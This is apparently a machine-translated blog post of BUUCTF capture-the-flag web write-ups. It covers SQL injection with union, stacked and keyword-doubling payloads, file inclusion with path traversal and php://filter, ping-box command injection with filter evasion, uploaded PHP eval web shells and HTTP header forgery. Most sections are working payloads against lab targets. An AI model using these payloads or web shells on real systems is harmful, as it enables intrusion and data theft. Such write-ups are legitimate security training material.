mititle: BUU Brush the inscription 1
date: 2022-05-12 22:07:34
tags: CTF_WEB
swiper_index:

1、[ Geek big pick 2019]EasySQL1

notice SQL I thought of trying universal password first

1’ or 1=1#

explain ：' To form a closed statement ,# Is the annotator ( The following statements are no longer executed )

It should be noted that :

1.# May be URL Automatic encoding leads to statement errors

2. Spaces are filtered and can be used /**/ Bypass

solve ：%23 by # Of the annotator url code

Statement equivalent ：

select * from table_name where username='1' or 1=1 # ' and password='xxxxxx'

2. In fact, we should simply judge whether there is an injection point

If the page returns an error , There is Sql Inject . The reason is that both character type and integer type will be because

The number of single quotation marks does not match

And report wrong .

3 The third step 、 utilize order by Look up the number of columns in the table

payload：username=1' order by 3%23&password=123（NO,Wrong username password！！！）
payload：username=1' order by 4%23&password=123（Unknown column '4' in 'order clause'）
The description table has only three columns

4. Step four 、 If there is echo , Echo bit found （ The echo , Displays the results of executing commands and batch processing ）

payload：username=1’ union select 1,2,3%23&password=123

Law two ： Both judgments are bypassed

Use twice 'or 1=1#

?username=1'or 1=1%23&password=1' or 1=1%23

[(70 Bar message ) CTF-BUUCTF-HCTF 2018]WarmUp_ Heizai's blog -CSDN Blog _buuctf Of warmup topic

2、[HCTF 2018]WarmUp

F12 Tips source.php

<?php
highlight_file(__FILE__);
class emmm
{
     
  public static function checkFile(&$page) 
  // Passed in variable page, That's what we just came in file
  {
     
  	//  The whitelist is defined here 
      $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
      if (! isset($page) || !is_string($page)) {
     
      /* In order to return  true  Two conditions must be met  1 page There is  2 page Is string  ,  The judgment here and outside file  Consensus is basically judged again */
          echo "you can't see it";
          return false;
      }
      if (in_array($page, $whitelist)) {
     
          return true;
      }
			/*in_array(search,array,type)  The function searches the array for the specified value ,  White list filtering , Need to return ture  So here we introduce page Or after truncation page Must be soure.php or hint.php,  This is a normal visit , We need to construct files that contain any , So the incoming conditions are not met here , This is not the point of attention , Continue to look down */
      $_page = mb_substr( 
          $page,
          0,
          mb_strpos($page . '?',  '?')
      );
			/* here mb_sustr  It's a truncation , return 0 To mb_strpos Content between , and mb_strps  Is to find the location of the first occurrence , Therefore, it can be basically understood as obtaining page  Two ？ String between , That is to get file Two ？ String between , Put it in url The middle is http://ip/?file=ddd? Medium file=ddd*/            
      if (in_array($_page, $whitelist)) {
      
          return true;
      }
      // This is similar to the above   see _page  Is it on the white list 
      $_page = urldecode($page); //  It's found here that it's right _page There was one decode decode ,
      $_page = mb_substr(// Get two ？？ Content between 
          $_page,
          0,
          mb_strpos($_page . '?', '?')
      );
      //  Here's the point we're going to bypass , Look up from here   Try to construct 
      if (in_array($_page, $whitelist)) {
     // White list 
          return true;
      }
      echo "you can't see it";
      return false;
  }
}
if (! empty($_REQUEST['file'])
  && is_string($_REQUEST['file'])
  && emmm::checkFile($_REQUEST['file'])
) {
     
  include $_REQUEST['file'];
  exit;
} else {
     
  echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
	/* Must satisfy if Conditions , To include file, It can also be guessed here that the file may contain ： 
		1 REQUEST['file'] Not empty  
		2 REQUEST['file'] Is string  
		3 checkFile($_REQUEST['file'])  by ture, go back to checkFile  Function analysis how to return true*/    
?>

 You can see that there are four... In the function code if sentence 
 first if Statement to verify variables , requirement $page For the string , Otherwise return to false
 the second if Sentence judgment $page Does it exist in $whitelist Array , To be is to return true
 Third if Statement judgment after interception $page Does it exist in $whitelist Array , Intercept $page in '?' The first part , To be is to return true
 The fourth one if Sentence judgment url Decode and intercept $page Does it exist in $whitelist in , To be is to return true
 If the above four if None of the statements returned a value , Then return to false
 There are three if Statement can return true, The second statement directly judges $page, Unavailable 
 The third statement intercepts '?' The first part , because ? Is parsed as get Parameters submitted by , Not to be used 
 The fourth one if In the sentence , to url Decode and intercept , So we can ? After two times url code , Decode the parameters on the server side once ,checkFile Decode once in function , Still decoded as '?', You can still go through the fourth if Statement verification .（'?' The two coding values are '%253f'）, structure url：
 So our payload  Namely 
file=source.php?file=source.php%253f../../../../../ffffllllaaaagggg

structure payload

source.php?file=source.php%253f../../../../../ffffllllaaaagggg

explain ：

1、PHP $_REQUEST

PHP $_REQUEST Used to collect HTML Data submitted by form .

2、? two url After coding is ：%253f

3、…/…/…/…/…/ guess ： according to ffffllllaaaagggg There are four reasons

3、[ Geek challenge 2019]Havefun

 $cat=$_GET['cat'];
      echo $cat;
      if($cat=='dog'){
    
          echo 'Syc{cat_cat_cat_cat}';
     }

payload:?cat=dog

Be careful ： Can not write ?cat=‘dog’（ Guesses may be parsed as character parameters ）

3、[ACTF2020 Freshman competition ]Include

Only ：Can you find out the flag?

There is no hint in the source code

No idea , Inquire about

Main idea ：

file=php://filter/read=convert.base64-encode/resource=flag.php

PHP in filter protocol

php://filter Use

Read source file , And use base code , Bypass

base64 The result of coding is ：

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7MzQ2NTQwYTAtMTI1MS00OGNmLTkyOWItODQ0NDVmMjc0ZTk4fQo=

Decoded as ：

<?php echo "Can you find out the flag?"; //flag{346540a0-1251-48cf-929b-84445f274e98}

It can be seen that ：flag For the comment content , It can be explained , After coding, you can see the complete source code

4、[ Strong net cup 2019] Note casually

sql Stack and inject knowledge

Stack injection principle ：

stay SQL in , A semicolon （;） It's used to express a sql The end of the statement . Imagine that we are ; End one sql Continue to construct the next statement after the statement , Will it be executed together ？ So this idea creates Stack Injection . and union injection（ Joint injection ） It is also a combination of two statements , Is there any difference between the two ？ The difference is that union perhaps union all The types of statements executed are limited , Can be used to execute query statements , Stack injection can execute any statement . For example, here is an example . User input ：1; DELETE FROM products Server generated sql Statement for ：（ Because the input parameters are not filtered ）Select * from products where productid=1;DELETE FROM products When the query is executed , The first item shows the query information , Second, delete the whole table .

The problem solving steps

Specific steps to solve the problem

Thinking summary ：

1. First judge whether there is an injection point
Input 1, Echo error ;

` Input 1#, Normal echo ;（ That there is sql Inject ）;

Input 1' or '1'='1（ Do not comment #, Still echo normal , Prove correct judgment ）

2. Judgment fields
1' order by 3 #（1、2 All right ,3 Echo error , The description has two fields ）《 Does it mean that there are two echo bits ？》

3. Continue query
1' union select 1,2# Echo error returns ：return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);( Regular matching , Filter keywords ), You can see it here ： Many query keywords have been filtered , The normal way is not to find

4.( Query the table and field , But the default query table is not what we want flag, therefore , Want to get it flag You must make the table and field of the default query and flag The location name matches )《 It can also be seen here , The second default query table given by others words It's not useless （ Need to know its internal name ）》
Since he didn't filter alert and rename, Then can we change the name of the watch , Change the name of lie again

payload:

/?inject=1';RENAME TABLE wordsTOwords1;RENAME TABLE 1919810931114514TOwords;ALTER TABLE wordsCHANGEflagid VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#

After finishing , Default query id=1, You can find out

payload:1' or 1 ='1#

5、[ACTF2020 Freshman competition ]Exec

Gave one to ping The input box of

php Simulate our common DOS Ordered ping Command method , The main use is php Of ** Built in functions **exec To call the system's ping command , So as to achieve ping Command function .

So I thought of passing exec Function to do RCE.

Knowledge point ：

Pay attention to exec The function must be supported by the server to call the built-in function of the system . You can also use system etc. php Built in functions to achieve this function

exec Execute an external program

Execute the given command command, But it doesn't output anything , It simply returns the last line from the result of the command , If you need to execute an order , And get all the information from the command , have access to passthru() This function .

system--- Run the external program and display the output

system() Execute the given command command, And output the result . If there are given parameters return_var, Then the status code of the execution command will be written to this variable .

Be careful : If you allow data from user input , Can be passed to this function , Then you should use escapeshellcmd() To make sure that this user cannot deceive (trick) System to execute arbitrary (arbitrary) command .

Be careful : If you use this function to start a program , And I hope in the background (background) Leave it when you execute , You must make sure that the output of this program is (redirected) To a file or some output stream , otherwise PHP Will hang (hang) Until the program is finished .

Usage method

; Both the front and back commands are executed , Whether the front is true or false 
| Execute the following statements directly 
|| If the previous command is wrong, execute the following statement , Otherwise, just execute the previous statement 
& Both the front and back commands are executed , Whether the front is true or false 
&& If the front is false , The following commands are not executed , If the previous is true, execute two commands 

payload

aaa ; cat /flag(cat flag error , guess ：/ It may be to find all directories flag)
aaa | cat /flag
aaa ||cat /flag
aaa & cat /flag
127.0.0.1 && cat /flag( Execute No flag)

Reference resources

php command exec

6、[SUCTF 2019]EasySQL

Knowledge point ：

PHP Short circuit operator

<?php
echo " a state scholar of no equal , You have a good journey , I firmly believe that the future must also be a world full of red flags ","\n";
$a = 5; 
$b = 20;
if ($a = 10 || $b = 7) {
       // The conversion type is bool type ,a=1,b Short circuited 
    $a++; //bool Does not participate in numerical operations 
    $b++;
    }
    echo $a,"\n","",$b; //1 21
?>

Reference resources ：

Deepen the understanding

Advanced ideas strike

General train of thought ：

The first one is ： Manual blind injection

Since his back end can do Digital echo Letters do not echo , There is one or structure , And it doesn't echo directly flag, But as a topic ,from It must be from flag.
So guess the backend ：

select $_POST['query'] || flag from flag

combination ：

mysql> select 1 from test;
+---+
| 1 |
+---+
| 1 |
| 1 |
+---+
2 rows in set (0.00 sec)

mysql> select a from test;
ERROR 1054 (42S22): Unknown column 'a' in 'field list'

Numbers can be echoed , Letters cannot

mysql> select 1|id from test;
+------+
| 1|id |
+------+
|    1 |
|    3 |
+------+
2 rows in set (0.00 sec)

mysql> select a|id from test;
ERROR 1054 (42S22): Unknown column 'a' in 'field list'

mysql> select *|id from test;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '|id from test' at line 1

Alphabetic characters are not allowed

payload：

*,1

amount to

select 1,flag from Flag
select *,1 from Flag
 Sentence meaning ： from Flag In the table , Query all fields , And display the last field value as 1

The second kind ： Stack Injection

payload:

1;set sql_mode=pipes_as_concat;select 1

Take a look at a writeup Say above , The first solution is the unexpected solution , The expected solution should be 1;set sql_mode=PIPES_AS_CONCAT;select 1.
Never heard of it , Check it out set sql_mode=PIPES_AS_CONCAT, Used for processing | The symbol of , take or Change the operation to Connect operation .

7、[ Geek challenge 2019]Secret File1

Topic environment ：

Do you want to know the secret of Jiang Luyuan ？

I can give it to you if you want , Go find it ！ Put everything there ！

F12 Look at the source code

href="./Archive_room.php"

Go to see

I put them all here , Go and have a look

SECRET

Syclover @ cl4y

End of review

Don't you see ？ Go back and have a closer look .

Syclover @ cl4y

What also have no ,------> The page jumps directly

bp Grab the bag

Return to header ：

<html>
<!-- secr3t.php -->
</html>

Keep looking at

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag On the flag.php in 
?>
</html>

Try to pass parameters ：

?file=flag.php

The page doesn't change except for the black background ,F12 In the style Change the background to white , nothing

Some keywords are filtered in the source code

Try to use filter filter

?file=php://filter/convert.base64-encode/resource=flag.php

Conduct base64 Transcode and get flag

[GXYCTF2019]Ping Ping Ping1

Description of the environment ：

/?ip=

ping Here we go ：ping 127.0.0.1

PING 127.0.0.1 (127.0.0.1): 56 data bytes

continue ：ping 127.0.0.1;ls;

PING 127.0.0.1 (127.0.0.1): 56 data bytes
flag.php
index.php

ping 127.0.0.1;ls;cat flag.php

/?ip= fxck your space!

??? tart

After trying , Filtered spaces

/?ip=

PING 1 (0.0.0.1): 56 data bytes
flag.php
index.php
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo " ";
  print_r($a);
}
?>

It's filtered out flag

else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    
    die("fxck your flag!");

payload：

?ip=127.0.0.1;ls;a=g;b=fla;cat$IFS$b$a.php

summary ：

ps: Pay attention to the order of parameters ,ba transposition ab,flag It will be detected ：）

Reference resources ：ctf ping Command execution

8、[ Geek challenge 2019]LoveSQL1

Title Description ：

These damn hackers , I found mine so soon flag, This time I put them in that place , Hem ！

user name ：

The secret code ：

Syclover @ cl4y

Ideas ：

1. Determine the injection point ：1' or 1=1# Get echo ：

Jump to the check.php page . And get the user name and password ：

Login Success!

Hello admin！

Your password is ‘be53a02c355072e2ef4eaa93c02c9ffb’

2. Try password md5 Decryption failed , Or return to the idea of injection , Number of query fields ：
stay url Input in ：

/check.php?username=admin' order by 3%23&password=1  There is  /check.php?username=admin' order by 4%23&password=1      Report errors 

Be careful ： Now it's in url The , So it can't be used #, And use it url code %23.

3. use union Query test injection point （ Echo point ）：

/check.php?username=1' union select 1,2,3%23&password=1

Login Success!

Hello 2！

Your password is ‘3’

4. The echo point is 2 and 3, Query the current database name and version ：

/check.php?username=1' union select 1,database(),version()%23&password=1

Hello geek！

Your password is ‘10.3.18-MariaDB’

5. Explosion meter ：

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

Hello 2！

Your password is ‘geekuser,l0ve1ysq1’

6. Guess for ：l0ve1ysq1 This table ：
Pop field ：

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1

Hello 2！

Your password is ‘id,username,password’

7. Burst data ：

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

Hello 2！

Your password is ‘1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{d9614f96-0272-4d9d-a8e4-de936e0cd958}’

obtain flag：

flag{d9614f96-0272-4d9d-a8e4-de936e0cd958}

9、[ Geek challenge 2019]Knife1

Title Description ：

I lost my kitchen knife , Can you help me find it

eval($_POST[“Syc”]);

EH , I feel like I will wow , But I don't have a kitchen knife haha , I don't know if I saw the only ant sword by fate flag

Ideas ：

bp Grab the bag ,post Pass in ：

<?php eval($_POST["Syc"]); ?>

A simple ： In the top directory ---->flag

10、[ Geek challenge 2019]Http1

Summary of knowledge points ：

1. Referer：Referer yes header Part of , When the browser to web When the server sends the request , Usually with Referer, Tell the server which page I link from , Whereby the server can get some information for processing .”
2. UA（User Agent）：“user agent Refers to the user agent , abbreviation UA. effect : Enables the server to identify the operating system and version used by the client 、CPU type 、 Browsers and versions 、 Browser rendering engine 、 Browser language 、 Browser plug-ins, etc . （ Generalization ： Generally, the name of the browser will be set in UA）
3. X-Forwarded-For ： HTTP Expand the head . Is used to identify the pass HTTP agent or Load balancing Way to connect to Web The server The most original client IP Address Of HTTP Request header field .

Description of the environment ：

Nothing valuable was found in the page , therefore F12 View source code , Find out ：

href="Secret.php"

Access jump page ：

obtain ：

It doesn't come from 'https://Sycsecret.buuoj.cn'

Now I think of it ： The title description is HTTP（ Request header forgery ？）

hacbar structure payload

1. structure ：Referer:https://Sycsecret.buuoj.cn
2. Tips ：Please use "Syclover" browser
3. structure ：User Agent: Syclover
4. Tips ：No!!! you can only read this locally!!!
5. structure ：X-Forwarded-For: 127.0.0.1
6. obtain flag：flag{54d0092a-e344-464a-b1b8-7a179015c8f6}

BP Grab the bag to modify HTTP Request header

GET /Secret.php HTTP/1.1
Host: node4.buuoj.cn:26365
User-Agent: Syclover
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Referer: https://Sycsecret.buuoj.cn
X-Forwarded-For: 127.0.0.1

Be careful ： In the constructed request header , A space is required after each parameter

11、[ Geek challenge 2019]Upload1

Description of the environment ：

File upload box , The prompt type is picture

---

Just submit one ：

return ：NOT image！

BP Grab the bag

take Content-Type The format inside is changed to image/jpeg

post The ginseng , Write a word Trojan ：

<?php **eval**(@$_POST['1']);?>

return ：NOT！php!

Filter suffix

Common file formats that bypass suffixes are ：php,php3,php4,php5,phtml.pht

here phtml To bypass , But back to ：
`NO! HACKER! your file included ‘<?’

To put it another way

GIF89a
<script language="php">eval($_POST['shell']);</script> 

Successfully bypassed

Ant sword connection

Guess the path is

http://432fcfb5-9ceb-4e54-9cb2-1eeabd3b10a6.node4.buuoj.cn:81/upload/aWord1.phtml

password ：

shell

Get... Under the root directory flag file

12、[ACTF2020 Freshman competition ]Upload1

Description of the environment

Upload files

The required format is ：

consider ： After uploading a sentence, the Trojan horse found that he had a white list , Only files ending with this can be uploaded , Then we change the suffix to png Upload , Reuse bp Grab the bag Change it to phtml Just fine

It is roughly the same as the previous question

BP Grab the bag to modify

`Content-Type: image/png

<?php eval(@$_POST['1']);?>`

return ：

Upload Success! Look here~ ./uplo4d/11b327e23e72bfb7bf0cc8c9d098384d.phtml

Construct ant sword link

http://d2dbf14f-ace8-4c2a-a53d-55ffd313eb12.node4.buuoj.cn:81/uplo4d/11b327e23e72bfb7bf0cc8c9d098384d.phtml

summary

1. This problem seems to have been filtered in the front end , Guess at js To judge , Try to find js-----> Failure
2. Can only BP The suffix type has been modified in packet capturing

13、[ Geek challenge 2019]BabySQL

Description of the environment

username、passwd box

It should be the injection point

1>

?username=11'&password=22

return ：

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '22'' at line 1

2>

order by Judging the number of columns 11' order by 4#

Find out order by Filtered

return

right syntax to use near 'der 4#' and password='22'' at line 1

union、or\where\select It's also filtered

3> Determine the echo position

New cheese ： Keyword double write bypass （ Guess is filtered only once ）

?username=15' ununionion seselectlect 1,3,4%23
&password=22

return

Hello 3！
Your password is '4'

4> Database search

11' ununionion seselectlect 1,2,database()%23&password=22

return

`Hello 2！

Your password is ‘geek’`

5> Look up the table

11' ununionion seselectlect 1,(seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'),database()%23&password=22

return ：

Hello b4bsql,geekuser！
Your password is ‘geek’

6> Check field

11' ununionion seselectlect 1,(seselectlect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'),database()%23&password=22

return

Hello id,username,password！

Your password is 'geek'

7> Check the value

11' ununionion seselectlect 1,(seselectlect group_concat(id,username,passwoorrd) frofromm b4bsql),database()%23&password=22

return ：

flag{fdbfc75c-253c-482b-8867-dfd6f0dd92e6}！

summary

After judging the injection point , Regular query , Some keywords were found to be bypassed

14、[RoarCTF 2019]Easy Calc

No idea

The query shows that there are two methods

1. utilize php The processing feature of strings bypasses waf
2. Http smuggle

Law 1

Carry out winding waf, First of all, let's get to know php The rules of parsing , When php When parsing , If the variable is preceded by a space , Will remove the preceding space and parse , Then we can use this feature to bypass waf.

structure payload To view the directory , use chr Turn it into ascll Code to bypass

payload1：

? num=1;var_dump(scandir(chr(47)))

1array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" }

payload2： see flag Content

? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

1string(43) "flag{5392e731-b3c2-45d6-9326-976c11b3c2b0} "